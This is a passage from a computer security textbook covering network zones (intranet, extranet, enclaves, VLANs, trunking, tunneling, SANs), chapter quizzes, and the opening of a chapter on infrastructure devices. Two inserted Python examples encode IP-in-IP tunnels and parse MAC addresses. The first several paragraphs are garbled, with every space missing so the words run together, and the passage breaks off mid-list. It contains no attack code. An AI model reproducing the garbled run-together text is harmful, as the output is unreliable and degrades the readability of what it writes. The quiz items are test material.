Becauseeverythingandeveryonecanaccessthisinterconnectedwebanditisoutsideofyourcontrolandabilitytoenforcesecuritypolicies,theInternetshouldbeconsideredanuntrustednetwork.AfirewallshouldexistatanyconnectionbetweenyourtrustednetworkandtheInternet.ThisisnottoimplythattheInternetisabadthing—itisagreatresourceforallnetworksandaddssignificantfunctionalitytoourcomputingenvironments.ThetermWorldWideWeb(WWW)isfrequentlyusedsynonymously
torepresenttheInternet,buttheWWWisactuallyjustonesetofservicesavailableviatheInternet.WWWor“theWeb”ismorespecificallytheHypertextTransferProtocol(HTTP)–basedservicesthataremade
availableovertheInternet.Thiscanincludeavarietyofactualservicesandcontent,includingtextfiles,pictures,streamingaudioandvideo,andevenvirusesandworms.
IntranetAnintranetdescribesanetworkthathasthesamefunctionalityastheInternetforusersbutliescompletelyinsidethetrustedareaofanetworkandisunderthesecuritycontrolofthesystemandnetworkadministrators.Typicallyreferredtoascampusorcorporatenetworks,intranetsareusedeverydayincompaniesaroundtheworld.Anintranetallowsadeveloperandauserthefullsetofprotocols—HTTP,FTP,instantmessaging,andsoon—thatisofferedontheInternet,butwiththeaddedadvantageoftrustfromthenetworksecurity.ContentonintranetwebserversisnotavailableovertheInternettountrustedusers.Thislayerofsecurityoffersasignificantamountofcontrolandregulation,allowinguserstofulfillbusinessfunctionalitywhileensuringsecurity.Twomethodscanbeusedtomakeinformationavailabletooutside
users:DuplicationofinformationontomachinesintheDMZcanmakeitavailabletootherusers.Propersecuritychecksandcontrolsshouldbemadepriortoduplicatingthematerialtoensuresecuritypoliciesconcerningspecificdataavailabilityarebeingfollowed.Alternatively,extranets(discussedinthenextsection)canbeusedtopublishmaterialtotrustedpartners.
ExamTip:Anintranetisaprivate,internalnetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestoorganizationalusers.
ShouldusersinsidetheintranetrequireaccesstoinformationfromtheInternet,aproxyservercanbeusedtomasktherequestor’slocation.This
helpssecuretheintranetfromoutsidemappingofitsactualtopology.AllInternetrequestsgototheproxyserver.Ifarequestpassesfilteringrequirements,theproxyserver,assumingitisalsoacacheserver,looksinitslocalcacheofpreviouslydownloadedwebpages.Ifitfindsthepageinitscache,itreturnsthepagetotherequestorwithoutneedingtosendtherequesttotheInternet.Ifthepageisnotinthecache,theproxyserver,actingasaclientonbehalfoftheuser,usesoneofitsownIPaddressestorequestthepagefromtheInternet.Whenthepageisreturned,theproxyserverrelatesittotheoriginalrequestandforwardsitontotheuser.Thismaskstheuser’sIPaddressfromtheInternet.Proxyserverscanperformseveralfunctionsforafirm;forexample,theycanmonitortrafficrequests,eliminatingimproperrequestssuchasinappropriatecontentforwork.Theycanalsoactasacacheserver,cuttingdownonoutsidenetworkrequestsforthesameobject.Finally,proxyserversprotecttheidentityofinternalIPaddressesusingNAT,althoughthisfunctioncanalsobeaccomplishedthrougharouterorfirewallusingNATaswell.
ExtranetAnextranetisanextensionofaselectedportionofacompany’sintranettoexternalpartners.Thisallowsabusinesstoshareinformationwithcustomers,suppliers,partners,andothertrustedgroupswhileusingacommonsetofInternetprotocolstofacilitateoperations.Extranetscanusepublicnetworkstoextendtheirreachbeyondacompany’sowninternalnetwork,andsomeformofsecurity,typicallyVPN,isusedtosecurethischannel.Theuseofthetermextranetimpliesbothprivacyandsecurity.Privacyisrequiredformanycommunications,andsecurityisneededtopreventunauthorizeduseandeventsfromoccurring.Bothofthesefunctionscanbeachievedthroughtheuseoftechnologiesdescribedinthischapterandotherchaptersinthisbook.Properfirewallmanagement,remoteaccess,encryption,authentication,andsecuretunnelsacrosspublicnetworksareallmethodsusedtoensureprivacyandsecurityforextranets.
ExamTip:Anextranetisasemiprivatenetworkthatusescommonnetworktechnologies(suchasHTTP,FTP,andsoon)toshareinformationandprovideresourcestobusinesspartners.Extranetscanbeaccessedbymorethanonecompany,becausetheyshareinformationbetweenorganizations.
FlatNetworksAsnetworkshavebecomemorecomplex,withmultiplelayersoftiersandinterconnections,aproblemcanariseinconnectivity.OneofthelimitationsoftheSpanningTreeProtocol(STP)isitsinabilitytomanageLayer2trafficefficientlyacrosshighlycomplexnetworks.STPwascreatedtopreventloopsinLayer2networksandhasbeenimprovedtothecurrentversionofRapidSpanningTreeProtocol(RSTP).RSTPcreatesaspanningtreewithinthenetworkofLayer2switches,disablinglinksthatarenotpartofthespanningtree.RSTP,IEEE802.1w,providesamorerapidconvergencetoanewspanningtreesolutionaftertopologychangesaredetected.Theproblemwiththespanningtreealgorithmsisthatthenetworktrafficisinterruptedwhilethesystemrecalculatesandreconfigures.Thesedisruptionscancauseproblemsinnetworkefficienciesandhaveledtoapushforflatnetworkdesigns,whichavoidpacket-loopingissuesthroughanarchitecturethatdoesnothavetiers.Onenameassociatedwithflatnetworktopologiesisnetworkfabric,a
termmeanttodescribeaflat,depthlessnetwork.Thesearebecomingincreasinglypopularindatacenters,andotherareasofhightrafficdensity,astheycanofferincreasedthroughputandlowerlevelsofnetworkjitterandotherdisruptions.Whilethisisgoodforefficiencyofnetworkoperations,this“everyonecantalktoeveryone”ideaisproblematicwithrespecttosecurity.
Enclaves
Modern networks, with their increasingly complex connections, result in systems where navigation can become complex between nodes. Just as a DMZ-based architecture allows for differing levels of trust, the isolation of specific pieces of the network using security rules can provide differing trust environments. The concept of breaking a network into enclaves can create areas of trust where special protections can be employed and traffic from outside the enclave is limited or properly screened before admission. Enclaves are not diametrically opposed to the concept of a flat network structure; they are just carved-out areas, like gated neighborhoods, where one needs special credentials to enter. A variety of security mechanisms can be employed to create a secure enclave. Layer 2 addressing (subnetting) can be employed, making direct addressability an issue. Firewalls, routers, and application-level proxies can be employed to screen packets before entry or exit from the enclave. Even the people side of the system can be restricted through the use of a special set of sysadmins to manage the systems. Enclaves are an important tool in modern secure network design. Figure 9.13 shows a network design with a standard two-firewall implementation of a DMZ. On the internal side of the network, multiple firewalls can be seen, carving off individual security enclaves, zones where the same security rules apply. Common enclaves include those for high-security databases, low-security users (call centers), public-facing kiosks, and the management interfaces to servers and network devices. Having each of these in its own zone provides for more security control. On the management layer, using a nonroutable IP address scheme for all of the interfaces prevents them from being directly accessed from the Internet.
• Figure 9.13 Secure enclaves
VLANs
A LAN is a set of devices with similar functionality and similar communication needs, typically co-located and operated off a single switch. This is the lowest level of a network hierarchy and defines the domain for certain protocols at the data link layer for communication. A virtual LAN (VLAN) is a logical implementation of a LAN and allows computers connected to different physical networks to act and communicate as if they were on the same physical network. A VLAN has many of the same characteristic attributes of a LAN and behaves much like a physical LAN but is implemented using switches and software. This very powerful technique allows significant network flexibility, scalability, and performance and allows administrators to perform network reconfigurations without having to physically relocate or recable systems.
Exam Tip: A broadcast domain is a logical division of a computer network. Systems connected to a broadcast domain can communicate with each other as if they were connected to the same physical network even when they are not.
Trunking
Trunking is the process of spanning a single VLAN across multiple switches. A trunk-based connection between switches allows packets from a single VLAN to travel between switches, as shown in Figure 9.14. Two trunks are shown in the figure: VLAN 10 is implemented with one trunk and VLAN 20 is implemented with the other. Hosts on different VLANs cannot communicate using trunks and thus are switched across the switch network. Trunks enable network administrators to set up VLANs across multiple switches with minimal effort. With a combination of trunks and VLANs, network administrators can subnet a network by user functionality without regard to host location on the network or the need to recable machines.
• Figure 9.14 VLANs and trunks
Security Implications
VLANs are used to divide a single network into multiple subnets based on functionality. This permits accounting and marketing, for example, to share a switch because of proximity yet still have separate traffic domains. The physical placement of equipment and cables is logically and programmatically separated so that adjacent ports on a switch can reference separate subnets. This prevents unauthorized use of physically close devices through separate subnets that are on the same equipment. VLANs also allow a network administrator to define a VLAN that has no users and map all of the unused ports to this VLAN (some managed switches allow administrators to simply disable unused ports as well). Then, if an unauthorized user should gain access to the equipment, that user will be unable to use unused ports, as those ports will be securely defined to nothing. Both a purpose and a security strength of VLANs is that systems on separate VLANs cannot directly communicate with each other.
Trunks and VLANs have security implications that you need to heed so that firewalls and other segmentation devices are not breached through their use. You also need to understand how to use trunks and VLANs, to prevent an unauthorized user from reconfiguring them to gain undetected access to secure portions of a network.
Zones and Conduits
The terms zones and conduits have specialized meaning in control system networks. Control systems are the computers used to control physical processes, ranging from traffic lights to refineries, manufacturing plants, critical infrastructure, and more. These networks are now being attached to enterprise networks, and this will result in the inclusion of control system network terminology into IT/network/security operations terminology. A term commonly used in control system networks is zone. A zone is a grouping of elements that share common security requirements. A conduit is defined as the path for the flow of data between zones. Zones are similar to enclaves in that they have a defined set of common security requirements that differ from outside the zone. The zone is marked on a diagram, indicating the boundary between what is in and outside the zone. All data flows in or out of a zone must be by a defined conduit. The conduit allows a means to focus the security function on the data flows, ensuring the appropriate conditions are met before data enters or leaves a zone.
Tunneling
Tunneling is a method of packaging packets so that they can traverse a network in a secure, confidential manner. Tunneling involves encapsulating packets within packets, enabling dissimilar protocols to coexist in a single communication stream, as in IP traffic routed over an Asynchronous Transfer Mode (ATM) network. Tunneling also can provide significant measures of security and confidentiality through encryption and encapsulation methods. The best example of this is a VPN that is established over a public network through the use of a tunnel, as shown in Figure 9.15, connecting a firm’s Boston office to its New York City (NYC) office.
• Figure 9.15 Tunneling across a public network
Assume, for example, that a company has multiple locations and decides to use the public Internet to connect the networks at these locations. To make these connections secure from outside unauthorized use, the company can employ a VPN connection between the different networks. On each network, an edge device, usually a router or VPN concentrator, connects to another edge device on the other network. Then, using IPsec protocols, these routers establish a secure, encrypted path between them.
This securely encrypted set of packets cannot be read by outside routers; only the addresses of the edge routers are visible. This arrangement acts as a tunnel across the public Internet and establishes a private connection, secure from outside snooping or use. Because of ease of use, low-cost hardware, and strong security, tunnels and the Internet are a combination that will see more use in the future. IPsec, VPN, and tunnels will become a major set of tools for users requiring secure network connections across public segments of networks. For more information on VPNs and remote access, refer to Chapter 11.
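The encapsulation half of the tunnel just described, as an added example that is not part of the book: an inner office-to-office IPv4 packet is wrapped in an outer IPv4 header addressed from one edge router to the other (IP-in-IP, protocol 4, per RFC 2003), so a transit router sees only the edge addresses. IPsec tunnel mode additionally encrypts and authenticates the inner packet (ESP); that part is not modelled here. All addresses and the payload are constructed (RFC 5737 documentation ranges for the edges).

```python
import struct
from ipaddress import IPv4Address

IPPROTO_IPIP = 4            # outer "protocol" value for IP-in-IP (RFC 2003)
IPPROTO_UDP = 17
HDR_FMT = "!BBHHHBBH4s4s"   # 20-byte IPv4 header without options


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of the header's 16-bit words, then complemented."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Assemble a minimal IPv4 packet with a correct header checksum."""
    fields = [0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
              IPv4Address(src).packed, IPv4Address(dst).packed]
    header = struct.pack(HDR_FMT, *fields)
    fields[7] = ipv4_checksum(header)       # computed with the checksum field zeroed
    return struct.pack(HDR_FMT, *fields) + payload


def parse_ipv4(packet: bytes) -> dict:
    """Decode a header; reject anything that is not IPv4 or fails its checksum."""
    (vihl, _tos, total_len, _ident, _frag, ttl, proto,
     _csum, src, dst) = struct.unpack(HDR_FMT, packet[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or ihl < 20 or total_len > len(packet):
        raise ValueError("malformed IPv4 packet")
    if ipv4_checksum(packet[:ihl]) != 0:    # an intact header sums to zero
        raise ValueError("bad IPv4 header checksum")
    return {"src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
            "proto": proto, "ttl": ttl, "payload": packet[ihl:total_len]}


def encapsulate(inner: bytes, edge_src: str, edge_dst: str) -> bytes:
    """Sending edge router: wrap the whole inner packet in an outer header."""
    return build_ipv4(edge_src, edge_dst, IPPROTO_IPIP, inner)


def decapsulate(outer: bytes) -> dict:
    """Receiving edge router: strip the outer header and hand the inner packet on."""
    outer_hdr = parse_ipv4(outer)
    if outer_hdr["proto"] != IPPROTO_IPIP:
        raise ValueError("not a tunnel packet")
    return parse_ipv4(outer_hdr["payload"])


def transit_view(outer: bytes) -> tuple:
    """What a router on the public Internet can tell without opening the tunnel."""
    outer_hdr = parse_ipv4(outer)
    return (outer_hdr["src"], outer_hdr["dst"], outer_hdr["proto"])


def demo() -> dict:
    # Constructed: private office LANs inside, documentation addresses for the edges.
    inner = build_ipv4("10.1.0.5", "10.2.0.7", IPPROTO_UDP, b"constructed payload")
    outer = encapsulate(inner, "203.0.113.1", "198.51.100.1")   # Boston edge -> NYC edge
    return {"transit": transit_view(outer), "delivered": decapsulate(outer)}


if __name__ == "__main__":
    print(demo())
```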
A VPN concentrator is a specialized piece of hardware designed to handle the encryption and decryption required for remote, secure access to an organization’s network.
Storage Area Networks
Storage area networks (SANs) are systems that provide remote storage of data across a network connection. The design of SAN protocols is such that the disk appears to actually be on the client machine as a local drive rather than as attached storage, as in network attached storage (NAS). This makes the disk visible in disk and volume management utilities and allows their functionality. Common SAN protocols include iSCSI and Fibre Channel.
iSCSI
The Internet Small Computer System Interface (iSCSI) is a protocol for IP-based storage. iSCSI can be used to send data over existing network infrastructures, enabling SANs. It is positioned as a low-cost alternative to Fibre Channel storage; its only real limitation is network bandwidth.
Fibre Channel
Fibre Channel (FC) is a high-speed network technology (with throughput up to 16 Gbps) used to connect storage to computer systems. The FC protocol is a transport protocol similar to the TCP protocol in IP networks. Because it is carried over special cables, one of the drawbacks of FC-based storage is cost.
FCoE
The Fibre Channel over Ethernet (FCoE) protocol encapsulates the FC frames, enabling FC communication over 10-Gigabit Ethernet networks.
Chapter 9 Review
For More Information
Networking: CompTIA Network+ Certification All-in-One Exam Guide, Premium Fifth Edition, McGraw-Hill, 2014
The Internet Engineering Task Force: www.ietf.org
Wikipedia articles:
Routing: http://en.wikipedia.org/wiki/Routing
NAT: http://en.wikipedia.org/wiki/Network_address_translation
ICMP: http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol
Subnetting: http://en.wikipedia.org/wiki/Subnetting
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about networks.
Identify the basic network architectures
There are two broad categories of networks: LANs and WANs.
The physical arrangement of a network is typically called the network’s topology.
There are four main types of network topologies: ring, bus, star, and mixed.
Define the basic network protocols
Protocols, agreed-upon formats for exchanging or transmitting data between systems, enable computers to communicate.
When data is transmitted over a network, it is usually broken up into smaller pieces called packets.
Most protocols define the types and format for packets used in that protocol.
TCP is connection oriented, requires the three-way handshake to initiate a connection, and provides guaranteed and reliable data delivery.
UDP is connectionless, lightweight, and provides limited error checking and no delivery guarantee.
Each network device has a unique hardware address known as a MAC address. The MAC address is used for packet delivery.
Network devices are also typically assigned a 32-bit number known as an IP address.
The Domain Name Service (DNS) translates names, like www.cnn.com, into IP addresses.
Explain routing and address translation
The process of moving packets from one end device to another through different networks is called routing.
Subnetting is the process of dividing a network address space into smaller networks.
DHCP allows network devices to be automatically configured on a network and temporarily assigned an IP address.
Network Address Translation (NAT) converts private, internal IP addresses to public, routable IP addresses and vice versa.
Classify security zones
A DMZ is a buffer zone between networks with different trust levels. Companies often place public resources in a DMZ so that Internet users and internal users may access those resources without exposing the internal company network to the Internet.
An intranet is a private, internal network that uses common network technologies (such as HTTP, FTP, and so on) to share information and provide resources to organizational users.
An extranet is a semiprivate network that uses common network technologies (such as HTTP, FTP, and so on) to share information and provide resources to business partners.
An enclave is a specialized security zone with common security requirements.
A VLAN (or virtual LAN) is a group of ports on a switch that is configured to create a logical network of computers that appear to be connected to the same network even if they are located on different physical network segments. Systems on a VLAN can communicate with each other but cannot communicate directly with systems on other VLANs.
Trunking is the process of spanning a single VLAN across multiple switches.
Tunneling is a method of packaging packets so that they can traverse a network in a secure, confidential manner.
Key Terms
Address Resolution Protocol (ARP), bus topology, datagram, denial-of-service (DoS), Domain Name System (DNS), DMZ, Dynamic Host Configuration Protocol (DHCP), enclave, Ethernet, extranet, flat network, Internet Control Message Protocol (ICMP), Internet Protocol (IP), intranet, local area network (LAN), Media Access Control (MAC) address, Network Address Translation (NAT), network, packet, protocol, ring topology, routing, star topology, storage area network (SAN), subnetting, subnet mask, three-way handshake, topology, Transmission Control Protocol (TCP), trunking, tunneling, User Datagram Protocol (UDP), virtual local area network (VLAN), wide area network (WAN)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. A(n) _______________ is a group of two or more devices linked together to share data.
2. A packet in an IP network is sometimes called a(n) _______________.
3. Moving packets from source to destination across multiple networks is called _______________.
4. The _______________ is the hardware address used to uniquely identify each device on a network.
5. A(n) _______________ tells you what portion of a 32-bit IP address is being used as the network ID and what portion is being used as the host ID.
6. The shape or arrangement of a network, such as bus, star, ring, or mixed, is known as the _______________ of the network.
7. A small, typically local network covering a relatively small area such as a single floor of an office building is called a(n) _______________.
8. A(n) _______________ is an agreed-upon format for exchanging information between systems.
9. The packet exchange sequence (SYN, SYN/ACK, ACK) that initiates a TCP connection is called the _______________.
10. _______________ is the protocol that allows the use of private, internal IP addresses for internal traffic and public IP addresses for external traffic.
Multiple-Choice Quiz
1. What is Layer 1 of the OSI model called?
A. The physical layer
B. The network layer
C. The initial layer
D. The presentation layer
2. The UDP protocol:
A. Provides excellent error-checking algorithms
B. Is a connectionless protocol
C. Guarantees delivery of packets
D. Requires a permanent connection between source and destination
3. The process that dynamically assigns an IP address to a network device is called:
A. NAT
B. DNS
C. DHCP
D. Routing
4. What is the three-way handshake sequence used to initiate TCP connections?
A. ACK, SYN/ACK, ACK
B. SYN, SYN/ACK, ACK
C. SYN, SYN, ACK/ACK
D. ACK, SYN/ACK, SYN
5. Which of the following is a control and information protocol used by network devices to determine such things as a remote network’s availability and the length of time required to reach a remote network?
A. UDP
B. NAT
C. TCP
D. ICMP
6. What is the name of the protocol that translates names into IP addresses?
A. TCP
B. DNS
C. ICMP
D. DHCP
7. Dividing a network address space into smaller, separate networks is called what?
A. Translating
B. Network configuration
C. Subnetting
D. Address translation
8. Which protocol translates private (nonroutable) IP addresses into public (routable) IP addresses?
A. NAT
B. DHCP
C. DNS
D. ICMP
9. The TCP protocol:
A. Is connectionless
B. Provides no error checking
C. Allows for packets to be processed in the order they were sent
D. Has no overhead
10. Which of the following would be a valid MAC address?
A. 00:07:e9
B. 00:07:e9:7c:c8
C. 00:07:e9:7c:c8:aa
D. 00:07:e9:7c:c8:aa:ba
Essay Quiz
1. A developer in your company is building a new application and has asked you if it should use TCP- or UDP-based communications. Provide her with a brief discussion of the advantages and disadvantages of each protocol.
2. Your boss wants to know if DHCP is appropriate for both server and PC environments. Provide her with your opinion and be sure to include a discussion of how DHCP works.
3. Describe the three basic types of network topologies and provide a sample diagram of each type.
4. Describe the three-way handshake process used to initiate TCP connections.
5. Your boss wants to know how subnetting works. Provide her with a brief description and be sure to include an example to illustrate how subnetting works.
Lab Projects
• Lab Project 9.1 A client of yours only has five external, routable IP addresses but has over 50 systems that it wants to be able to reach the Internet for web surfing, e-mail, and so on. Design a network solution for the client that addresses their immediate needs but will still let them grow in the future.
• Lab Project 9.2 Your boss wants you to learn how to use the arp and nslookup commands. Find a Windows machine and open a command/DOS prompt. Type in arp and press ENTER to see the options for the arp command. Use the arp command to find the MAC address of your system and at least five other systems on your network. When you are finished with arp, type in nslookup and press ENTER. At the prompt, type in the name of your favorite web site, such as www.cnn.com. The nslookup command will return the IP addresses that match that domain name. Find the IP addresses of at least five different web sites.
Chapter 10 Infrastructure Security
The higher your structure is to be, the deeper must be its foundation.
—SAINT AUGUSTINE
In this chapter, you will learn how to
Construct networks using different types of network devices
Enhance security using security devices
Enhance security using NAC/NAP methodologies
Identify the different types of media used to carry network signals
Describe the different types of storage media used to store information
Use basic terminology associated with network functions related to information security
Describe the different types and uses of cloud computing
Infrastructure security begins with the design of the infrastructure itself. The proper use of components improves not only performance but security as well. Network components are not isolated from the computing environment and are an essential aspect of a total computing environment. From the routers, switches, and cables that connect the devices, to the firewalls and gateways that manage communication, from the network design, to the protocols that are employed—all these items play essential roles in both performance and security.
Devices
A complete network computer solution in today’s business environment consists of more than just client computers and servers. Devices are needed to connect the clients and servers and to regulate the traffic between them. Devices are also needed to expand this network beyond simple client computers and servers to include yet other devices, such as wireless and handheld systems. Devices come in many forms and with many functions, from hubs and switches, to routers, wireless access points, and special-purpose devices such as virtual private network (VPN) devices. Each device has a specific network function and plays a role in maintaining network infrastructure security.
Cross Check
The Importance of Availability
In Chapter 2, we examined the CIA of security: confidentiality, integrity, and availability. Unfortunately, the availability component is often overlooked, even though availability is what has moved computing into the modern networked framework and plays a significant role in security. Security failures can occur in two ways. First, a failure can allow unauthorized users access to resources and data they are not authorized to use, compromising information security. Second, a failure can prevent a user from accessing resources and data the user is authorized to use. This second failure is often overlooked, but it can be as serious as the first. The primary goal of network infrastructure security is to allow all authorized use and deny all unauthorized use of resources.
Workstations
Most users are familiar with the client computers used in the client/server model called workstation devices. The workstation is the machine that sits on the desktop and is used every day for sending and reading e-mail, creating spreadsheets, writing reports in a word processing program, and playing games. If a workstation is connected to a network, it is an important part of the security solution for the network. Many threats to information security can start at a workstation, but much can be done in a few simple steps to provide protection from many of these threats.
Cross Check
Workstations and Servers
Servers and workstations are key nodes on networks. The specifics for securing these devices are covered in Chapter 14.
Servers
Servers are the computers in a network that host applications and data for everyone to share. Servers come in many sizes, from small single-CPU boxes that may be less powerful than a workstation, to multiple-CPU monsters, up to and including mainframes. The operating systems used by servers range from Windows Server, to UNIX, to Multiple Virtual Storage (MVS) and other mainframe operating systems. The OS on a server tends to be more robust than the OS on a workstation system and is designed to service multiple users over a network at the same time. Servers can host a variety of applications, including web servers, databases, e-mail servers, file servers, print servers, and application servers for middleware applications.
Virtualization
Virtualization technology is used to allow a computer to have more than one OS present and, in many cases, operating at the same time. Virtualization is an abstraction of the OS layer, creating the ability to host multiple OSs on a single piece of hardware. One of the major advantages of virtualization is the separation of the software and the hardware, creating a barrier that can improve many system functions, including security. The underlying hardware is referred to as the host machine, and on it is a host OS. Either the host OS has built-in hypervisor capability or an application is needed to provide the hypervisor function to manage the virtual machines (VMs). The virtual machines are typically referred to as the guest OSs.
Exam Tip: A hypervisor is the interface between a virtual machine and the host machine hardware. Hypervisors are the layer that enables virtualization.
Newer OSs are designed to natively incorporate virtualization hooks, enabling virtual machines to be employed with greater ease. There are several common virtualization solutions, including Microsoft Hyper-V, VMware, Oracle VM VirtualBox, Parallels, and Citrix Xen. It is important to distinguish between virtualization and boot loaders that allow different OSs to boot on hardware. Apple’s Boot Camp allows you to boot into Microsoft Windows on Apple hardware. This is different from Parallels, a product with complete virtualization capability for Apple hardware. Virtualization offers much in terms of host-based management of a system. From snapshots that allow easy rollback to previous states, faster system deployment via preconfigured images, ease of backup, and the ability to test systems, virtualization offers many advantages to system owners. The separation of the operational software layer from the hardware layer can offer many improvements in the management of systems.
Snapshots
A snapshot is a point-in-time saving of the state of a virtual machine. Snapshots have great utility because they are like a save point for an entire system. Snapshots can be used to roll a system back to a previous point in time, undo operations, or provide a quick means of recovery from a complex, system-altering change that has gone awry. Snapshots act as a form of backup and are typically much faster than normal system backup and recovery operations.
Patch Compatibility
Having an OS operate in a virtual environment does not change the need for security associated with the OS. Patches are still needed and should be applied, independent of the virtualization status. Because of the nature of a virtual environment, it should have no effect on the utility of patching, as the patch is for the guest OS.
Host Availability/Elasticity
When you set up a virtualization environment, protecting the host OS and hypervisor level is critical for system stability. The best practice is to avoid the installation of any applications on the host-level machine. All apps should be housed and run in a virtual environment. This aids in the stability by providing separation between the application and the host OS. The term elasticity refers to the ability of a system to expand/contract as system requirements dictate. One of the advantages of virtualization is that a virtual machine can be moved to larger or smaller environments based on needs. If a VM needs more processing power, then migrating the VM to a new hardware system with greater CPU capacity allows the system to expand without having to rebuild it.
Security Control Testing
When applying security controls to a system to manage security operations, it is important to test the controls to ensure that they are providing the desired results. Putting a system into a VM does not change this requirement. In fact, it may complicate it because of the nature of the guest OS to hypervisor relationship. It is essential to specifically test all security controls inside the virtual environment to ensure their behavior is still effective.
Sandboxing
Sandboxing refers to the quarantine or isolation of a system from its surroundings. Virtualization can be used as a form of sandboxing with respect to an entire system. You can build a VM, test something inside the VM, and, based on the results, make a decision with regard to stability or whatever concern was present.
Mobile Devices
Mobile devices such as laptops, tablets, and mobile phones are the latest devices to join the corporate network. Mobile devices can create a major security gap, as a user may access separate e-mail accounts, one personal, without antivirus protection, and the other corporate. Mobile devices are covered in detail in Chapter 12.
Device Security, Common Concerns
As more and more interactive devices (that is, devices you can interact with programmatically) are being designed, a new threat source has appeared. In an attempt to build security into devices, typically, a default account and password must be entered to enable the user to access and configure the device remotely. These default accounts and passwords are well known in the hacker community, so one of the first steps you must take to secure such devices is to change the default credentials. Anyone who has purchased a home office router knows the default configuration settings and can check to see if another user has changed theirs. If they have not, this is a huge security hole, allowing outsiders to “reconfigure” their network devices.
Tech Tip
Default Accounts
Always reconfigure all default accounts on all devices before exposing them to external traffic. This is to prevent others from reconfiguring your devices based on known access settings.
Network Attached Storage
Because of the speed of today’s Ethernet networks, it is possible to manage data storage across the network. This has led to a type of storage known as Network Attached Storage (NAS). The combination of inexpensive hard drives, fast networks, and simple application-based servers has made NAS devices in the terabyte range affordable for even home users. Because of the large size of video files, this has become popular for some users as a method of storing TV and video libraries. Because NAS is a network device, it is susceptible to various attacks, including sniffing of credentials and a variety of brute-force attacks to obtain access to the data.
Removable Storage
Because removable devices can move data outside of the corporate-controlled environment, their security needs must be addressed. Removable devices can bring unprotected or corrupted data into the corporate environment. All removable devices should be scanned by antivirus software upon connection to the corporate environment. Corporate policies should address the copying of data to removable devices. Many mobile devices can be connected via USB to a system and used to store data—and in some cases vast quantities of data. This capability can be used to avoid some implementations of data loss prevention mechanisms.
Networking
Networks are used to connect devices together. Networks are composed of components that perform networking functions to move data between devices. Networks begin with network interface cards, then continue in layers of switches and routers. Specialized networking devices are used for specific purposes, such as security and traffic management.
Network Interface Cards
To connect a server or workstation to a network, a device known as a network interface card (NIC) is used. A NIC is a card with a connector port for a particular type of network connection, either Ethernet or Token Ring. The most common network type in use for LANs is the Ethernet protocol, and the most common connector is the RJ-45 connector. A NIC is the physical connection between a computer and the network.
The purpose of a NIC is to provide lower-level protocol functionality from the OSI (Open System Interconnection) model. Because the NIC defines the type of physical layer connection, different NICs are used for different physical protocols. NICs come as single-port and multiport, and most workstations use only a single-port NIC, as only a single network connection is needed. Figure 10.1 shows a common form of a NIC. For servers, multiport NICs are used to increase the number of network connections, increasing the data throughput to and from the network.
• Figure 10.1 Linksys network interface card (NIC)
Each NIC port is serialized with a unique code, 48 bits long, referred to as a Media Access Control address (MAC address). These are created by the manufacturer, with 24 bits representing the manufacturer and 24 bits being a serial number, guaranteeing uniqueness. MAC addresses are used in the addressing and delivery of network packets to the correct machine and in a variety of security situations. Unfortunately, these addresses can be changed, or “spoofed,” rather easily. In fact, it is common for personal routers to clone a MAC address to allow users to use multiple devices over a network connection that expects a single MAC.
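A parser for the 48-bit MAC format just described, as an added example that is not from the book: it accepts the common notations, rejects anything that is not exactly six octets (the format the chapter 9 quiz asks about), and splits the address into its 24-bit manufacturer (OUI) and 24-bit serial halves. It also reads the two IEEE 802 flag bits of the first octet, which the text does not mention; note that a cloned address copied from a real NIC keeps the vendor's bits, so these flags alone do not reveal spoofing. Sample addresses are constructed.

```python
import re

# Accepted spellings of a 48-bit MAC: colon or hyphen pairs, dotted 16-bit groups, or bare hex.
_MAC_FORMS = (
    re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$"),
    re.compile(r"^(?:[0-9a-f]{2}-){5}[0-9a-f]{2}$"),
    re.compile(r"^(?:[0-9a-f]{4}\.){2}[0-9a-f]{4}$"),
    re.compile(r"^[0-9a-f]{12}$"),
)


def is_valid_mac(text: str) -> bool:
    """True only for exactly six octets (48 bits) written in one consistent notation."""
    candidate = text.strip().lower()
    return any(form.match(candidate) for form in _MAC_FORMS)


def parse_mac(text: str) -> dict:
    """Split a MAC into its 24-bit OUI and 24-bit serial and decode the first-octet flags."""
    if not is_valid_mac(text):
        raise ValueError("not a 48-bit MAC address: %r" % text)
    octets = bytes.fromhex(re.sub(r"[:\-.]", "", text.strip()))
    first = octets[0]
    return {
        "canonical": ":".join("%02x" % b for b in octets),
        "oui": octets[:3].hex(),                     # manufacturer part
        "serial": octets[3:].hex(),                  # per-device part
        # IEEE 802 flag bits in the first transmitted octet (a fact not stated in the text above)
        "multicast": bool(first & 0x01),             # I/G bit: 1 = group address, never a NIC
        "locally_administered": bool(first & 0x02),  # U/L bit: 1 = assigned locally, not burned in
    }


def check_candidates(candidates) -> dict:
    """Validate a list of strings, e.g. the four options in chapter 9's multiple-choice question 10."""
    return {c: is_valid_mac(c) for c in candidates}
```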
Hubs
A hub is networking equipment that connects devices that are using the same protocol at the physical layer of the OSI model. A hub allows multiple machines in an area to be connected together in a star configuration, with the hub as the center. This configuration can save significant amounts of cable and is an efficient method of configuring an Ethernet backbone. All connections on a hub share a single collision domain, a small cluster in a network where collisions occur. As network traffic increases, it can become limited by collisions. The collision issue has made hubs obsolete in newer, higher performance networks, with inexpensive switches and switched Ethernet keeping costs low and usable bandwidth high. Hubs also create a security weakness in that all connected devices see all traffic, enabling sniffing and eavesdropping to occur. In today’s networks, hubs have all but disappeared, being replaced by low-cost switches.
Tech Tip
Device/OSI Level Interaction
Different network devices operate using different levels of the OSI networking model to move packets from device to device:
Bridges
